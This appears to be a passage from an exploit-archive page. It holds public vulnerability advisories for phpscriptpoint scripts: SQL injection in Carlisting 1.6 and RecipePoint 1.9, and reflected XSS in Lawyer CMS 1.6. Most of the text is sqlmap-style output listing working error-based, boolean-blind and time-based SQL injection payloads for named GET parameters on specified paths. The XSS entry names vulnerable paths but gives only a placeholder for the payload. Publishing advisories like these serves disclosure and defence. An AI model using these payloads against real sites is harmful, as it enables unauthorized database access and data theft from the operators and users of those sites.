ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&state=CA&city=LosParameter: state (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&city=LosParameter: city (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: brand_id=1&model_id=1&car_condition=New Car&price_range=1&car_category_id=1&body_type_id=1&fuel_type_id=1&transmission_type_id=2&year=2023&mileage_start=10&mileage_end=200&country=USA&state=CA&city=Los' AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW---[-] Done

Carlisting 1.6 SQL Injection

RecipePoint version 1.9 suffers from a remote SQL injection vulnerability.

# Exploit Title: RecipePoint 1.9 - SQL Injection  
# Exploit Author: CraCkEr  
# Date: 15/07/2023  
# Vendor: phpscriptpoint  
# Vendor Homepage: https://phpscriptpoint.com/  
# Software Link: https://demo.phpscriptpoint.com/recipepoint/  
# Tested on: Windows 10 Pro  
# Impact: Database Access

## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of  
data and crash the application or make it unavailable, leading to lost revenue and  
damage to a company's reputation.

Path: /recipepoint/recipe-result

GET parameter 'text' is vulnerable to SQL Injection  
GET parameter 'category' is vulnerable to SQL Injection  
GET parameter 'type' is vulnerable to SQL Injection  
GET parameter 'difficulty' is vulnerable to SQL Injection  
GET parameter 'cuisine' is vulnerable to SQL Injection  
GET parameter 'cooking_method' is vulnerable to SQL Injection

https://website/recipepoint/recipe-result?text=[SQLI]&category=[SQLI]&type=[SQLI]&difficulty=[SQLI]&cuisine=[SQLI]&cooking_method=[SQLI]

---  
Parameter: text (GET)  
    Type: error-based  
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
    Payload: text=") AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

    Type: boolean-based blind  
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
    Payload: text=") OR NOT 07033=7033-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: category (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: type (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free"XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR"Z&difficulty=Beginner&cuisine=2&cooking_method=1

Parameter: difficulty (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free&difficulty=Beginner"XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR"Z&cuisine=2&cooking_method=1

Parameter: cuisine (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&cooking_method=1

Parameter: cooking_method (GET)  
    Type: time-based blind  
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)  
    Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=(SELECT(0)FROM(SELECT(SLEEP(5)))a)  
---

[-] Done

RecipePoint 1.9 SQL Injection

Lawyer CMS version 1.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Lawyer CMS 1.6 - Reflected XSS# Exploit Author: CraCkEr# Date: 16/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/lawyer/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /lawyer/page.phpURL parameter is vulnerable to RXSShttps://website/lawyer/page.php/[XSS]?slug=blog&page=2Path: /lawyer/search.phpURL parameter is vulnerable to RXSShttps://website/lawyer/search.php/[XSS]?search_string=&page=2[-] Done

Tag

#php